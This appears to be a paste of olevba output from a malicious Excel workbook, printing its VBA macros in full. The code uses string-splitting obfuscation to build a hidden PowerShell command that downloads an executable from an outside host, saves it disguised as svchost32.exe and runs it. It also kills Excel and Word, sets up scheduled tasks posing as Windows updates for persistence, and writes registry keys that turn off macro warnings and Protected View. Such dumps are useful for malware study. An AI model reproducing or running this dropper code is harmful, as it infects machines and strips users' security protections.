- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- End Sub
- -------------------------------------------------------------------------------
- VBA MACRO Sheet1.cls
- in file: xl/vbaProject.bin - OLE stream: 'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- (empty macro)
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: xl/vbaProject.bin - OLE stream: 'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub duckyou()
- End Sub
- '################################### Second Stage ####################################
- set AlWhaWu8AmxahJAs = CreateObject("WScript.Shell")
- Dim Al89AwnAmxahJAs1
- Dim Al89AwnAmxahJAs2
- Dim Al89AwnAmxahJAs3
- Dim Al89AwnAmxahJAs4
- Dim Al89AwnAmxahJAs5
- Dim Al89AwnAmxahJAs6
- Dim Al89AwnAmxahJAs7
- Dim Al89AwnAmxahJAs8
- Dim Al89AwnAmxahJAs9
- Dim Al89AwnAmxahJAs010
- Dim Al89AwnAmxahJAs011
- Dim Al89AwnAmxahJAs012
- Dim Al89AwnAmxahJAs013
- Dim Al89AwnAmxahJAs014
- Al89AwnAmxahJAs1 = "PowerShel"
- Al89AwnAmxahJAs2 = "l (New-Ob"
- Al89AwnAmxahJAs3 = "ject Syst"
- Al89AwnAmxahJAs4 = "em.Net.We"
- Al89AwnAmxahJAs5 = "bClient)."
- Al89AwnAmxahJAs6 = "DownloadF"
- Al89AwnAmxahJAs7 = "ile('http://onedrivenet.xyz/work/exe/20.exe',"
- Al89AwnAmxahJAs8 = "'%Public%\s"
- Al89AwnAmxahJAs9 = "vchost32."
- Al89AwnAmxahJAs010 = "exe');S"
- Al89AwnAmxahJAs011 = "tart-Pr"
- Al89AwnAmxahJAs012 = "ocess '%"
- Al89AwnAmxahJAs013 = "Public%\sv"
- Al89AwnAmxahJAs014 = "chost32.exe'"
- Al89AwnAmxahJAs20 = Al89AwnAmxahJAs1 + Al89AwnAmxahJAs2 + Al89AwnAmxahJAs3 + Al89AwnAmxahJAs4 + Al89AwnAmxahJAs5 + Al89AwnAmxahJAs6 + Al89AwnAmxahJAs7 + Al89AwnAmxahJAs8 + Al89AwnAmxahJAs9 + Al89AwnAmxahJAs010 + Al89AwnAmxahJAs011 + Al89AwnAmxahJAs012 + Al89AwnAmxahJAs013 + Al89AwnAmxahJAs014
- AlWhaWu8AmxahJAs.run Al89AwnAmxahJAs20, vbHide
- set tskkill = CreateObject("WScript.Shell")
- Dim STArTkwZkill
- STArTkwZkill = "Powershell -WindowStyle Hidden taskkill /f /im Excel.exe"
- tskkill.run STArTkwZkill, vbHide
- set Machuda2 = CreateObject("WScript.Shell")
- Dim STArTkwZtime
- STArTkwZtime = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs /F"
- Machuda2.run STArTkwZtime, vbHide
- set Machuda22 = CreateObject("WScript.Shell")
- Dim STArTkwZ2time
- STArTkwZ2time = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates2 /TR C:\\Users\\Public\\svchost325.vbs /F"
- Machuda22.run STArTkwZ2time, vbHide
- set HOalwu = CreateObject("WScript.Shell")
- Dim AmwQ2
- AmwQ2 = "schtasks /delete /tn WindowsUpdate /F"
- HOalwu.run AmwQ2, vbHide
- Set wso = CreateObject("WScript.Shell")
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
- wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
- set tskkillword = CreateObject("WScript.Shell")
- Dim STArTkwZkillword
- STArTkwZkillword = "Powershell -WindowStyle Hidden taskkill /f /im winword.exe"
- tskkillword.run STArTkwZkillword, vbHide
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement